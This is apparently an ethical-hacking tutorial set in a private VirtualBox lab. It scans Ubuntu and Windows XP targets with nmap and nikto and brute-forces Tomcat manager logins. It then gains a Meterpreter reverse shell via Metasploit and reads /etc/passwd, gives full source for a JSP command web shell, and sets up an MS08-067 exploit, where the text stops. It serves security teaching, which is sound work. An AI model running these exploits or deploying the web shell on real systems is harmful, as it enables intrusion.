This tutorial describes the basic principles of gathering information to exploit vulnerable machines like Ubuntu Server and Windows XP. On both systems (Ubuntu and Windows) are installed some vulnerable services like Tomcat Java / Samba File Server or vulnerable Databases like PostgreSQL for Ubuntu machine and MySQL for Windows respectively.

This tutorial outlines many of the security flaws on both OS machines, such as:

  • Gathering information
  • Identify open network services
  • Exploit vulnerable services

(Note: For the Purpose of this tutorial BackBox (Based on Ubuntu) as OS, the latest installation package of Oracle VM Box, and Ubuntu 9.04 / Windows XP SP2 OS’s will be used)

Setting Up VM – Manual ifconfig

Before starting our Penetration Testing on the VM’s, we’ll setup and configure a couple of things on the VM machine system. After we have created our OS machine (Both Ubuntu and Windows OS) click the “Settings” button and navigate to the “Network” tab once more. At network interface, choose the “Host-only Adapter” and automatically the vboxnet0 option will be set.

Next we’ll set up the eth0 interface for Ubuntu OS. On the terminal type:

ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up

If you would like to have the network information statically assigned without having to manually enter this information each time, you can edit the /etc/network/ interfaces file for the appropriate Ethernet device.

# The host-only network interface
auto eth0
iface eth0 inet static
address 192.168.56.102
netmask 255.255.255.0
network 192.168.56.0
broadcast 192.168.56.255

(Note: Be sure to restart the network service after modifying this file (/etc/init.d/ networking restart).)

Next you will set up the Windows Network Interface. On the command prompt type cmd and click “OK”.

Then Navigate to the Network Connections Panel.

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

Next at the properties panel choose “Internet Protocol(TCP/IP)” and click “Properties”. On the “General” tab choose the “Use the following IP address” and add the appropriate network information (see below):

Next at the command prompt write the following command to verify the adapter options:

ipconfig /all

Verifying connectivity

We will attempt to ping the machines to verify connectivity. If everything is configured correctly, you should see something along the lines of the following commands:

Ubuntu Machine:

root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
--- 192.168.56.102 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms

And

root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
--- 192.168.56.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms

Windows Machine:

root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
--- 192.168.56.103 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms

And

C:Documents and Settingswindowsxp>ping 192.168.56.1
Pinging 192.168.56.1 with 32 bytes of data:
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.56.1
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Gathering Information – Ubuntu Machine

We’ll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we will perform a simple scan to determine what ports are open on our target system using the -p option.

root@wizard32:~# nmap -p- 192.168.56.102
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds

Looking at the highlighted results, we can determine that there are many open ports. So let’s use another tool to identify a little bit more on our machine.

root@wizard32:~# nikto -h 192.168.56.102 -p 8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        8180
+ Start Time:         2013-06-19 14:04:00
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2013-06-19 14:05:24 (84 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 8180/tcp runs an Apache Tomcat Server. We can identify the Version of Apache Tomcat Server once more using Metasploit.

msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host
msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run
[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, Apache Tomcat/5.5 is used. So once more using Metasploit we’ll try to connect to the Apache Tomcat Server according to some default user/pass options:

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run
[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'
[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'
[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Reviewing the result we can identify that Apache Tomcat Server accepts as username/password the “tomcat” string, so according to this result, let’s exploit it:

msf> use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war ...
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp...
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT ...
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
::
:

Vulnerable Web Service

Open a browser and type in the field, the IP of the VM and specify the port of Apache Tomcat server (IP:Port)

Next click on “Tomcat Manager” from the Administration Panel at the left and type as username/password the “tomcat” string.

Next we’ll create and upload a vulnerable .war file which will give us access to execute a vulnerable code. So create a cmd_shell.jsp file, which will contain the following code:

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML>
<TITLE>JSP Shell</TITLE>
<BODY>
Note: Against Windows you may need to prefix your command with cmd.exe /c
</br></br>
JSP Command:
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</PRE>
</BODY>
</HTML>

Then compress the file using the jar command as follows:

jar -cvf cmd.war cmd_shell.jsp

(Note: .war format is the acceptable file type for deploy at Apache Tomcat Manager)

Next Browse the .war file and then deploy it. As we can see the /cmd path was added.

Click this path and then on the navigation bar to complete the path adding cmd_shell.jsp:

At this point we can type any Unix/Windows command like running a command prompt window.

Gathering Information – Windows XP Machine

We’ll begin by trying some basic scan as previews against our VM (Windows XP) machine at 192.168.56.103.

root@wizard32:~# nmap -p- 192.168.56.103
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00070s latency).
Not shown: 65528 closed ports
PORT      STATE   SERVICE
25/tcp     open    smtp
80/tcp    open    http
135/tcp   open    msrpc
139/tcp   open    netbios-ssn
443/tcp   open    https
445/tcp   open    microsoft-ds
1025/tcp  open    NFS-or-IIS
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

Looking at the highlighted results, we can determine that there are many open ports. So let’s focus on port 445. Using the nmap tool once more we’ll add a couple of parameters to discover a little bit more of the specific port.

root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: windowsx-c7b000
|   NetBIOS computer name: WINDOWSX-C7B000
|   Workgroup: WORKGROUP
|_  System time: 2013-06-18 04:36:59 UTC+3
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.56.103
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds

-A: Aggressive initiates many options at once such as version and script scanning. Use with caution.

Want to learn more?? The InfoSec Institute Ethical Hacking course goes in-depth into the techniques used by malicious, black hat hackers with attention getting lectures and hands-on lab exercises. While these hacking skills can be used for malicious purposes, this class teaches you how to use the same hacking techniques to perform a white-hat, ethical hack, on your organization. You leave with the ability to quantitatively assess and measure threats to information assets; and discover where your organization is most vulnerable to black hat hackers. Some features of this course include:

  • Dual Certification - CEH and CPT
  • 5 days of Intensive Hands-On Labs
  • Expert Instruction
  • CTF exercises in the evening
  • Most up-to-date proprietary courseware available

-T (0-5): Timing options Determines how aggressive you want the scan to be.

-Pn: We stop this action for sending out a pingrequest

-p: Only scan specified ports

Identify network services – Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 445/tcp runs a SMB Server. We can identify the OS environment which the SMB server runs by typing:

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.56.103
RHOSTS => 192.168.56.103
msf auxiliary(smb_version) > run
[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the SMB Server runs on the Windows XP SP2 environment. So once more using Metasploit will try to exploit it.

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103
RHOST => 192.168.56.103
set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
